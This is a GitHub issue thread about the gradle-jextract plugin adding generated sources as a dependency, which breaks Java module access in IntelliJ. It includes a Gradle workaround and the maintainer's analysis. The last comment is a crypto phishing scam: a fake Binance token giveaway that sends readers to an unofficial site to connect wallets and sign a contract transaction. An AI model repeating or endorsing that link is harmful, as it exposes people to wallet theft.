### ISSUE TITLE
IntelliJ Project Import Issue

### ISSUE THREAD

**Issue by Brownshome** [krakowski/gradle-jextract#17]
# Environment

  * JDK version: `20`
  * Gradle version: `8.2.1`
  * `gradle-jextract` version: `0.4.1`
  * Operating system: Windows 11
  * IDE: IntelliJ IDEA 2023.2
  
# How does this bug occur?

When using jextract in source-mode in a Java module project that is openned as an IntelliJ project.

# What happens when the bug occurs?

A dependency is added on the output directory, which contains the sources. This causes issues in IDEA IntelliJ as it sees these files as in the unnamed module, causing import and module access issues.

# Would you like to submit a PR fixing this bug?
  
  [x] **YES**
  [ ] **NO**

**Comment by Brownshome** [comment]
Working on getting a minimal reproducible example of this, I'll attach one when I can.

**Comment by Brownshome** [comment]
I'm using the same fix as the example zip on my end:
```gradle
plugins.withType(JextractPlugin).configureEach {
	configurations {
		implementation {
			dependencies.removeIf {
				it instanceof FileCollectionDependency
			}
		}
	}
}
```
This won't be viable as a long-term fix (as it breaks class output support), some options that I'll look into are:
- Splitting the jextract output into sources and classes and only adding a dependency on the classes
- Added the dependency only if jextract is run in classes mode

I'm not sure class output will ever work in a Java module project without patching or something similar as I was under the understanding that modules had to be compiled as one unit, but I'm not 100% on that.

**Comment by krakowski** [comment]
Hi @Brownshome,

thanks for bringing this to my attention! I've never used Java modules inside a project before, so I wasn't aware of this. The bug you experience does also happen when using Gradle standalone via the console (without IntelliJ). I don't really know if this is a bug with Gradle. Adding the generated sources folder as a dependency shouldn't hide the module, in my opinion.

Ideally, I would like to enable/disable the inclusion of the dependency based on the `sourceMode` parameter [here](https://github.com/krakowski/gradle-jextract/blob/master/src/main/kotlin/io/github/krakowski/jextract/JextractPlugin.kt#L59-L61). The Task configuration is being read once the task gets executed, so (at the moment) I don't see a way of getting the `sourceMode` value at the referenced line. 

The easiest fix would be to remove the class-mode feature from this plugin, which would allow to remove the dependency on the generated sources folder. There once was a discussion on the `panama-dev` mailing list about problems with jextract and class-mode : https://mail.openjdk.org/pipermail/panama-dev/2021-February/012096.html

> I'm not sure class output will ever work in a Java module project without patching or something similar as I was under the understanding that modules had to be compiled as one unit, but I'm not 100% on that.

I also couldn't find any documentation on this. This is the only documentation I found on dependencies without support for modules: https://docs.gradle.org/current/userguide/java_library_plugin.html#using_libraries_that_are_not_modules

> A third case are traditional libraries that provide no module information at all — for example commons-cli:commons-cli:1.4. Gradle puts such libraries on the classpath instead of the module path. The classpath is then treated as one module (the so called unnamed module) by Java.

Adding a manifest could fix this, but I don't really know if this works outside of JARs.

> Others, like org.apache.commons:commons-lang3:3.10, may not offer a full module descriptor but will at least contain an Automatic-Module-Name entry in their manifest file to define the module’s name (org.apache.commons.lang3 in the example). Such modules, that only have a name as module description, are called automatic module that export all their packages and can read all modules on the module path.

**Comment by Brownshome** [comment]
I'd be happy to explore some of these options in a PR! (might be a week or so till I get some solid time to look at this again though).

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
